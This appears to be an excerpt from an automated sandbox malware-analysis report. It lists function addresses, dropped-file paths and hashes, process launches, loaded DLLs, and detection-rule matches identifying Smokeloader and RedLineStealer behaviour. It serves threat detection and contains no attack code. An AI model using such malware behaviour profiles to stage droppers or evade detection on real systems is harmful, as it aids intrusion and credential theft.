Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD682B2
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD687FE
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD78A13
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD68210
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD67DDE
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD67DE4
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD615E6
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DADF3FF0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD66BD0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD6A573
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD66D20
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD64930
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD64709
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD712E0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD64EC0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD67CD5
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD680A0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD686B0
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD61474
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD71C40
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD67A2D
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD61430
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B042A70
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B039E90
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B1564A0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B039550
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B043D80
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03A7C0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0393C0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0427F0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03AFF0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03BFE0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B156020
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B156220
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B095C40
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03343A
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B040040
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B096270
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03D460
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B069E60
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B080A60
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B032C90
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03BC90
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03E090
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B07D290
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B080090
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B044C80
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B038A80
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B046A80
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B048880
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B04A280
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03F8B0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0416B0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B034CA0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03EAA0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B045AC9
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0C60D0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0966D0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0398D0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B041AD0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0D42C0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0684C0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0472F0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B07DCF0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0350E0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03C4E0
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0350DF
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B043310
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B095F00
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03D900
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03C930
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B043930
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03BB20
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03F720
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B067F20
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B095940
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B0FA570
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B040970
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B034574
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B07D770
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B080570
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B095760
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B039D5A
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B06B760
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B039190
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: 7_2_00007FF65B03D190
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B045D907_2_00007FF65B045D90
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B04A3907_2_00007FF65B04A390
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03E7807_2_00007FF65B03E780
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0495807_2_00007FF65B049580
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0CB7B07_2_00007FF65B0CB7B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D7B07_2_00007FF65B03D7B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03E3B07_2_00007FF65B03E3B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0807B07_2_00007FF65B0807B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0403A07_2_00007FF65B0403A0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0471A07_2_00007FF65B0471A0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0383D07_2_00007FF65B0383D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0387D07_2_00007FF65B0387D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03ABD07_2_00007FF65B03ABD0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0475C07_2_00007FF65B0475C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B044FF07_2_00007FF65B044FF0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0325E07_2_00007FF65B0325E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0337E07_2_00007FF65B0337E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B041DE07_2_00007FF65B041DE0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D0107_2_00007FF65B03D010
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0680107_2_00007FF65B068010
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0466007_2_00007FF65B046600
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07DA007_2_00007FF65B07DA00
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0C8E307_2_00007FF65B0C8E30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0408307_2_00007FF65B040830
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03FC307_2_00007FF65B03FC30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07E8307_2_00007FF65B07E830
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B048C307_2_00007FF65B048C30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B039C207_2_00007FF65B039C20
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B154E107_2_00007FF65B154E10
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_004256739_2_00425673
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00426ACC9_2_00426ACC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00425D6B9_2_00425D6B
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_0042512F9_2_0042512F
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00424BEB9_2_00424BEB
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00402D8C9_2_00402D8C
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\70C1.exe 910E7F453F7842758E874A6AC98301F157E4EA6F9C6CA8A8E2AC0983D03D989B
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\AA31.exe F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Code function: String function: 00007FF65B038A80 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: String function: 00007FF7DAD67DE4 appears 33 times
Source: 70C1.exe.1.dr | Static PE information: Number of sections : 11 > 10
Source: AA31.exe.1.dr | Static PE information: Number of sections : 11 > 10
Source: n72I7qB2ss.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@9/5
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0065EAC0 CreateToolhelp32Snapshot,Module32First
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ashcvvs
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\70C1.tmp
Source: C:\Users\user\AppData\Roaming\ashcvvs | Command line argument: pq@9_2_004070C0
Source: n72I7qB2ss.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: n72I7qB2ss.exe | ReversingLabs: Detection: 71%
Source: n72I7qB2ss.exe | Virustotal: Detection: 58%
Source: unknown | Process created: C:\Users\user\Desktop\n72I7qB2ss.exe "C:\Users\user\Desktop\n72I7qB2ss.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ashcvvs C:\Users\user\AppData\Roaming\ashcvvs
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\70C1.exe C:\Users\user\AppData\Local\Temp\70C1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\AA31.exe C:\Users\user\AppData\Local\Temp\AA31.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ashcvvs C:\Users\user\AppData\Roaming\ashcvvs
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\70C1.exe C:\Users\user\AppData\Local\Temp\70C1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\AA31.exe C:\Users\user\AppData\Local\Temp\AA31.exe
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\ashcvvs | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ashcvvs | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\ashcvvs | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\AA31.exe | Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: Binary string: ntdll.pdb source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 
00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.000
      Source: Binary string: ntdll.pdbUGP source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 